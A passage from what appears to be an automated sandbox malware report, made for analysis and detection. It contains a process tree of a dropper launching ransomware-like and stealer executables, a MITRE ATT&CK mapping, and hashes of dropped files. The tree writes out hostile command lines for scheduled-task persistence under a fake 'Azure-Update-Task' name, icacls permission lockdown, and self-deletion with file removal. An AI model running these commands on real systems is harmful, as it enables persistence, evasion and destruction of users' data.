                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.exe" -a
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2356
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_2.exe
                                                                                                                                                                                                        sonia_2.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:1192
                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                        PID:4200
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:4228
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:5400
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                          PID:5976
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:5080
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AAA8.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                            PID:5060
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AAA8.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\AAA8.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Modifies extensions of user files
                                                                                                                                                                                                              PID:5612
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build2.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build2.exe"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:6308
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build2.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build2.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  PID:6516
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:5208
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /im build2.exe /f
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:3888
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:4852
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build3.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build3.exe"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                  PID:6912
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build3.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\21b03fea-bd8c-4fd5-9728-40cf81a11576\build3.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:6356
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:5136
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BE41.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BE41.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5844
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:5436
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5292
                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:5680
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding E69B3679C3FD13820887BE89E5B76CE6 C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:2652
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 60855D5F0959880789FBEEF8F09DC7D8
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:6868
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:3096
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding E2F6A2BF584ACE713D5C2B5559E39DBC E Global\MSI0000
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:4596
                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                            PID:3844
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1CEC.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1CEC.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:4212
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A7SHT45zPw.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\A7SHT45zPw.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6860
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:5336
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1CEC.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:6796
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:5016
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lEY8Nd8GwP.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\lEY8Nd8GwP.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:6448
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4812
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\27AB.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\27AB.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\27AB.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\27AB.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6992
                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                      PID:6488
                                                                                                                                                                                                                    • C:\Windows\System32\slui.exe
                                                                                                                                                                                                                      C:\Windows\System32\slui.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                      PID:4812
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5980
                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                      PID:5908
                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:7056

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                        5
                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                        3
                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                        Security Software Discovery

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1063

                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7f10f9e8ae3e736e6b3f839a4eb42f24

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6b5991b57dad3a7633ae6879e1e3e5c11ae38d87

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          75bf444bb06c3eb5dad2444f9b0dbdea7ec8fd5542337cabe9088d12df3b60c6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          e647ba9ed7abb21fad66dbe5c5353b980d8359d2850fe39435a0defd85c5226f6fba52d00600f4d4d2d55041b864d436e6307cf248e4881b78a31961b9302c9f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          2a5f42ab890cb92e44a99b519c8d4e0e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          665769378baf2b9a333ec703a2f7787340eb47c0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b1cd725d452d71ef8b012908748673bdcadac25805975738d6a65884ab70b7f5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          e93550732ae80ebde7303072212e285050ed37344f0813b065912518d1fc3c29cc88bf56d586c40f108ab98e0d717d08cc3906c25f3acf799745206aacc8ee20

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b08ed6498d6a0e38de2c10032a222b26

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          4ec8491888c815c15b3cc195e024a10760a2f933

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e5985e336f164f68b5a08a399e324126d79ede7454a99431fd6f8844563440c7

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f4d8174c94d7841cbfb34bf81f3a17a14ae676de04d5cdd31a7f66360f102c71c90b0cdd6e51e2b0d02da95d84a8faf29ba6bd2c56d789599d8a877c57b8fa8d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a2a38441f8b20a01226d56aeaafba8bb

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fe610438aa2df97579301a04d9f9322ed4b12992

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c34038d0f88b104051330fb499a3380a80a86b948b34c7753cea88ccd1f9acd0

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fbedc8c3c3dfd4c555d7becce27fb52fd47436b49bcd8a3edf9a4916b1830dbecd2425b73ceea594a76308f4e6fb410d1772ee603530605075ac5e6257e32520

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\libcurl.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\libcurlpp.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\libstdc++-6.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\libwinpthread-1.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\setup_install.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\setup_install.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_1.txt
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_2.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_2.txt
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_3.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_3.txt
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                          SHA512

